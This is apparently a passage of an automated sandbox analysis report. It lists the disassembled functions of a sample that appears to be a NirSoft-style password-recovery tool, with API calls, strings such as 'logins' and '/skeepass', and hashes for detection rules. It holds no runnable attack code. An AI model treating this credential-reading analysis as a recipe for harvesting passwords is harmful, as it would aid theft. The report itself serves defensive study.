                                • Opcode Fuzzy Hash: f76f60bccd3da85fbe49f53365f8b4a79ddd0aed292bd4a30626083a862f5199
                                • Instruction Fuzzy Hash: 2121ACB2D4021876D720B7929C46ECF7B6CAF41759F010477B90C72083DAB95B98CAAE
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00407FDF, Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 228COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                  • Part of subcall function 0040CC26: FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                  • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                • memset.MSVCRT ref: 0040806A
                                • memset.MSVCRT ref: 0040807F
                                • _wtoi.MSVCRT ref: 004081AF
                                • _wcsicmp.MSVCRT ref: 004081C3
                                • memset.MSVCRT ref: 004081E4
                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 00408218
                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040822F
                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408246
                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040825D
                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408274
                                  • Part of subcall function 00407FC3: _wtoi64.MSVCRT ref: 00407FC7
                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040828B
                                  • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E44
                                  • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E5B
                                  • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407E7E
                                  • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407ED7
                                  • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407EEE
                                  • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407F01
                                  • Part of subcall function 00407E1E: wcscpy.MSVCRT ref: 00407F10
                                  • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                  • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$ChangeCloseFileFindNotificationSize_wtoi_wtoi64wcscpy
                                • String ID: logins$null
                                • API String ID: 3492182834-2163367763
                                • Opcode ID: 0c5bf0fe86f5c58e26a0e15e1bc426e9e739ab0ab567f24c82d75e1353058837
                                • Instruction ID: fdf7b148d119976dec4a4ca0125bd44813aaa3c4ab878784613783167982a03f
                                • Opcode Fuzzy Hash: 0c5bf0fe86f5c58e26a0e15e1bc426e9e739ab0ab567f24c82d75e1353058837
                                • Instruction Fuzzy Hash: 48713371904219AEEF10BBA2DD82DDF767DEF00318F10457FB508B61C2DA785E458BA9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00408560, Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 182stringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                • ??2@YAPAXI@Z.MSVCRT ref: 0040859D
                                  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                • memset.MSVCRT ref: 004085CF
                                • memset.MSVCRT ref: 004085F1
                                • memset.MSVCRT ref: 00408606
                                • strcmp.MSVCRT ref: 00408645
                                • _mbscpy.MSVCRT ref: 004086DB
                                • _mbscpy.MSVCRT ref: 004086FA
                                • memset.MSVCRT ref: 0040870E
                                • strcmp.MSVCRT ref: 0040876B
                                • ??3@YAXPAX@Z.MSVCRT ref: 0040879D
                                • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                • String ID: ---
                                • API String ID: 3437578500-2854292027
                                • Opcode ID: 21a6322ba18577bc46aec975adf03c12409291e792631dacc9722dcc295f812b
                                • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                • Opcode Fuzzy Hash: 21a6322ba18577bc46aec975adf03c12409291e792631dacc9722dcc295f812b
                                • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041083A, Relevance: 21.1, APIs: 14, Instructions: 137windowCOMMON
                                Download Yara Rule
                                APIs
                                • memset.MSVCRT ref: 0041087D
                                • memset.MSVCRT ref: 00410892
                                • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                • GetSysColor.USER32(0000000F), ref: 00410999
                                • DeleteObject.GDI32(?), ref: 004109D0
                                • DeleteObject.GDI32(?), ref: 004109D6
                                • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                • String ID:
                                • API String ID: 1010922700-0
                                • Opcode ID: 6697d86bd39682251f5c1914ef9d5b2959c55de28960e84646fd269688f34b04
                                • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                                • Opcode Fuzzy Hash: 6697d86bd39682251f5c1914ef9d5b2959c55de28960e84646fd269688f34b04
                                • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00418680, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 88COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                • malloc.MSVCRT ref: 004186B7
                                • ??3@YAXPAX@Z.MSVCRT ref: 004186C7
                                • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                • ??3@YAXPAX@Z.MSVCRT ref: 004186E0
                                • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                • malloc.MSVCRT ref: 004186FE
                                • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                • ??3@YAXPAX@Z.MSVCRT ref: 00418716
                                • ??3@YAXPAX@Z.MSVCRT ref: 0041872A
                                • ??3@YAXPAX@Z.MSVCRT ref: 00418749
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: ??3@$FullNamePath$malloc$Version
                                • String ID: |A
                                • API String ID: 4233704886-1717621600
                                • Opcode ID: 120bca0df7996060a851268a0569be7b62d1400f73c55317773b03da867e4687
                                • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                                • Opcode Fuzzy Hash: 120bca0df7996060a851268a0569be7b62d1400f73c55317773b03da867e4687
                                • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004125F8, Relevance: 21.1, APIs: 7, Strings: 7, Instructions: 70COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: _wcsicmp
                                • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                • API String ID: 2081463915-1959339147
                                • Opcode ID: ed70c74fadb10ab7d72ef9915f44c0908033a9cd6b37cdcdb0b46a34d9d8d060
                                • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                                • Opcode Fuzzy Hash: ed70c74fadb10ab7d72ef9915f44c0908033a9cd6b37cdcdb0b46a34d9d8d060
                                • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004138C1, Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 49libraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
                                • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                                • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                                • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                                • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                                • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                • API String ID: 2012295524-70141382
                                • Opcode ID: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                                • Opcode Fuzzy Hash: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041383D, Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 44libraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
                                • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                                • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                                • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                                • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: AddressProc$HandleModule
                                • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                • API String ID: 667068680-3953557276
                                • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                                • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00412172, Relevance: 19.7, APIs: 13, Instructions: 189windowCOMMON
                                Download Yara Rule
                                APIs
                                • GetDC.USER32(00000000), ref: 004121FF
                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                • SetBkMode.GDI32(?,00000001), ref: 00412232
                                • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                • SelectObject.GDI32(?,?), ref: 00412251
                                • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                  • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                  • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                  • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                • SetCursor.USER32(00000000), ref: 004122BC
                                • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                • memcpy.MSVCRT ref: 0041234D
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                • String ID:
                                • API String ID: 1700100422-0
                                • Opcode ID: 982738172b7671ed7e60757921d653f6822ff96d67897b30d29685b1d4afaeae
                                • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                • Opcode Fuzzy Hash: 982738172b7671ed7e60757921d653f6822ff96d67897b30d29685b1d4afaeae
                                • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004111C1, Relevance: 18.1, APIs: 12, Instructions: 113COMMON
                                Download Yara Rule
                                APIs
                                • GetClientRect.USER32(?,?), ref: 004111E0
                                • GetWindowRect.USER32(?,?), ref: 004111F6
                                • GetWindowRect.USER32(?,?), ref: 0041120C
                                • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                • GetWindowRect.USER32(00000000), ref: 0041124D
                                • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                • EndDeferWindowPos.USER32(?), ref: 0041130B
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: Window$Defer$Rect$BeginClientItemPoints
                                • String ID:
                                • API String ID: 552707033-0
                                • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040C084, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 110stringfileCOMMON
                                Download Yara Rule
                                APIs
                                • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,0040C255,?,?,*.*,0040C2BF,00000000), ref: 0040C0A4
                                  • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                  • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                  • Part of subcall function 0040BFF3: memcpy.MSVCRT ref: 0040C024
                                • memcpy.MSVCRT ref: 0040C11B
                                • strchr.MSVCRT ref: 0040C140
                                • strchr.MSVCRT ref: 0040C151
                                • _strlwr.MSVCRT ref: 0040C15F
                                • memset.MSVCRT ref: 0040C17A
                                • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
                                • String ID: 4$h
                                • API String ID: 4066021378-1856150674
                                • Opcode ID: 71bd764b9dcf29740d9000bfd46b6f343dec630bed034bbd58b4fa538d0cb68c
                                • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                • Opcode Fuzzy Hash: 71bd764b9dcf29740d9000bfd46b6f343dec630bed034bbd58b4fa538d0cb68c
                                • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00414621, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 99COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: memset$_snwprintf
                                • String ID: %%0.%df
                                • API String ID: 3473751417-763548558
                                • Opcode ID: 2b153c1cf1109f668433ad91a4c4fbef48d688dda569af0dd2d123790ad71e5e
                                • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                                • Opcode Fuzzy Hash: 2b153c1cf1109f668433ad91a4c4fbef48d688dda569af0dd2d123790ad71e5e
                                • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004060A4, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97timewindowCOMMON
                                Download Yara Rule
                                APIs
                                • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                • KillTimer.USER32(?,00000041), ref: 004060D7
                                • KillTimer.USER32(?,00000041), ref: 004060E8
                                • GetTickCount.KERNEL32 ref: 0040610B
                                • GetParent.USER32(?), ref: 00406136
                                • SendMessageW.USER32(00000000), ref: 0040613D
                                • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                • String ID: A
                                • API String ID: 2892645895-3554254475
                                • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040D957, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97windowCOMMON
                                Download Yara Rule
                                APIs
                                • LoadMenuW.USER32(?,?), ref: 0040D97F
                                  • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                                  • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                                  • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                                  • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                                • DestroyMenu.USER32(00000000), ref: 0040D99D
                                • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                                • GetDesktopWindow.USER32 ref: 0040D9FD
                                • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                                • memset.MSVCRT ref: 0040DA23
                                • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                                • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                                • DestroyWindow.USER32(00000005), ref: 0040DA70
                                  • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                • String ID: caption
                                • API String ID: 973020956-4135340389
                                • Opcode ID: e527282329e758372625c7aced3bf19f10c29faef3bcce853f9f760d7f68934a
                                • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                                • Opcode Fuzzy Hash: e527282329e758372625c7aced3bf19f10c29faef3bcce853f9f760d7f68934a
                                • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00410A60, Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 90COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                                • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                                • <table dir="rtl"><tr><td>, xrefs: 00410B00
                                • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: memset$_snwprintf$wcscpy
                                • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                • API String ID: 1283228442-2366825230
                                • Opcode ID: aad372153645cc2b66520eb5eda5f4843b54733af1e5b0f3fbeb8aacc0aad8fb
                                • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                                • Opcode Fuzzy Hash: aad372153645cc2b66520eb5eda5f4843b54733af1e5b0f3fbeb8aacc0aad8fb
                                • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00413959, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 82COMMON
                                Download Yara Rule
                                APIs
                                • wcschr.MSVCRT ref: 00413972
                                • wcscpy.MSVCRT ref: 00413982
                                  • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                  • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                  • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                • wcscpy.MSVCRT ref: 004139D1
                                • wcscat.MSVCRT ref: 004139DC
                                • memset.MSVCRT ref: 004139B8
                                  • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
